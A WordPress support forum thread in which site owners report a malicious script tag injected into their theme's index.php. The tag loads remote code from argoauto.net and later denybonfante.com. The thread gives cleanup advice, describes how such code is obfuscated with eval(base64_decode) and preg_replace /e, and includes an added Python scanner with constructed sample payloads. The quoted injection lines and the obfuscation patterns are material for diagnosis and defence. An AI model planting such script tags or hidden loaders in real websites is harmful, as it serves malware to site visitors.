• This morning my site had this as the first line of code

    <script type="text/javascript" src="https://argoauto.net/tmp/index-bkp.php"></script>

    and Google chrome is throwing malware warnings.

    Can’t find it in the header or functions files… Anyone else encountered this bug?

    Thanks
    Cooper

Viewing 7 replies - 16 through 22 (of 22 total)
  • Got that same script, same malware warning from Google. I deleted that script, which was at the very top of index.php in the main theme file. My host, bluehost.com, is not being very helpful: sent a standard “how to deal with a hack” support email. And yes, I’ll go do all that, but wow, what a pain. I have pretty good backups to restore, but somehow I think the vulnerability will still be there.

    Basics: Running WordPress 3.4.2 with Weaver II Pro
    Hosted by Bluehost
    Lots of plugins, notably Contact Form 7 and Google Calendar Events

    funkytime said: “make sure you change your password, someone or a script cracked your password.”

    and that seems sound, and yet I have to ask (naive security question) “how”? I was using a nine-character password with upper- and lower-case letters, at least one number, and at least one special symbol. I didn’t write it down anywhere. It should have taken thousands and thousands of attempts to crack it — shouldn’t that have alerted somebody to a security problem?

    Or, to put it another way: Does alien injected code in index.php mean somebody surely has my password? Or is it more likely that some other vulnerability did it, like excessive permissions for a plugin?

    I am curious about this, not trying to be cute or snippy. When I foul up my own passwords, I usually get locked out after a handful of unsuccessful logins — how is some hacker getting thousands and thousands of attempts?

    Does alien injected code in index.php mean somebody surely has my password?

    No, there are many ways you can get hacked, although if you are running Windows and get a virus then it is possible for that virus to steal your password, regardless of how strong it was. If you log in or use ftp over an unsecured wireless network (Starbucks or Panera, for example) it can get stolen that way as well.

    If you’re hosting on Bluehost then odds are it is not an insecurity with the server (their servers are underpowered imo, but safe). If it wasn’t a virus or other password theft then most likely it would have been a script exploit, which means just fixing the visible hack won’t be enough. You should do a complete rebuild of the main site (fresh core WordPress, all fresh plugins) and carefully check the theme and uploads. Also, if you are hosting more than 1 domain on that account you will need to go through the others as well to make sure nothing else was affected.

    @ken.crosby.evb –

    This shows up in my Malware search in Developer tools and a few other sites. I am unable to find ‘argoauto.net’ in any searches of my files or my database. Where could this be hiding?

    Sometimes code like this will be encrypted, where you won’t see it directly in either the php or the database, and it only shows once WordPress has processed the php. The most common ways are either through using long random-looking base64 encoded strings (typically implemented as eval(base64_decode("… snippets), or via a line that starts like this: preg_replace("/.*/e","\x65\x76\x61.
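
The two hiding patterns named in the reply above explain why a plain search for the domain finds nothing. The following scanner is an added example, not part of the original thread: it undoes `\xNN` escapes and base64 string literals layer by layer before matching. The rule names, the sample files and the `malware.example` URL are constructed for illustration.

```python
import base64, binascii, re
from pathlib import Path

HEX_ESC = re.compile(r'\\x([0-9a-fA-F]{2})')
B64_LITERAL = re.compile(r'["\']([A-Za-z0-9+/]{24,}={0,2})["\']')
RULES = {  # heuristic patterns; the names are this example's own labels
    "eval(base64_decode(": re.compile(r'eval\s*\(\s*base64_decode\s*\(', re.I),
    "preg_replace /e modifier": re.compile(
        r'preg_replace\s*\(\s*(["\'])([^\w\s\\])[^"\']*?\2[a-zA-Z]*e[a-zA-Z]*\1', re.I),
    "script tag with remote src": re.compile(
        r'<script[^>]+src\s*=\s*["\']?https?://', re.I),
}

def unescape_hex(text):
    """Replace PHP-style hex escapes with the characters they stand for."""
    return HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)

def scan_text(text, depth=0, max_depth=3):
    """Return sorted (layer, rule) hits; layer 0 is the file as stored on disk."""
    hits = set()
    plain = unescape_hex(text)
    for name, rx in RULES.items():
        if rx.search(plain):
            hits.add((depth, name))
    if depth < max_depth:  # peel nested base64 layers, but not forever
        for m in B64_LITERAL.finditer(plain):
            try:
                inner = base64.b64decode(m.group(1), validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                continue  # not base64-encoded text, e.g. a hash or binary blob
            hits |= set(scan_text(inner, depth + 1, max_depth))
    return sorted(hits)

def scan_tree(root):
    """Scan every .php file under root (e.g. a theme folder); return {path: hits}."""
    report = {}
    for path in Path(root).rglob("*.php"):
        hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

# Constructed samples: the payload URL is a placeholder, not taken from the thread.
PAYLOAD = '<script type="text/javascript" src="https://malware.example/x.php"></script>'
SAMPLE = '<?php eval(base64_decode("%s")); ?>' % base64.b64encode(
    ("echo '%s';" % PAYLOAD).encode()).decode()
HEX_SAMPLE = r'<?php preg_replace("/.*/e","\x65\x76\x61\x6c(...)","."); ?>'
```

A hit is a reason to inspect the file by hand, not proof of infection: some legitimate plugins use base64 literals too.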

    Thanks, that’s helpful. So I guess when a password gets compromised, it’s not usually a brute-force attack.

    I haven’t seen much more about this particular exploit, so I guess it’s not as widespread as that timthumb.php business. Basic measures seem to have the malicious code gone from my site, and when I get some time away from my day job I’ll do more. (Volunteer webmaster, little community site . . . you get the picture.)

    I just found this script inserted in our website. It created a text widget under one of our sidebars. No one seems to have a solution for this at the moment.

    Thread Starter mistercooper

    (@mistercooper)

    The latest line is <script type="text/javascript" src="https://denybonfante.com/app/Menu.php"></script>. Still no clue where it comes from. About once a month they appear at the top of my theme’s index.

    I have removed the line <script type="text/javascript" src="https://denybonfante.com/app/Menu.php"></script>

    but the web still got Malware detected

    need help here ??

  • The topic ‘Malware links script from www.argoauto.net’ is closed to new replies.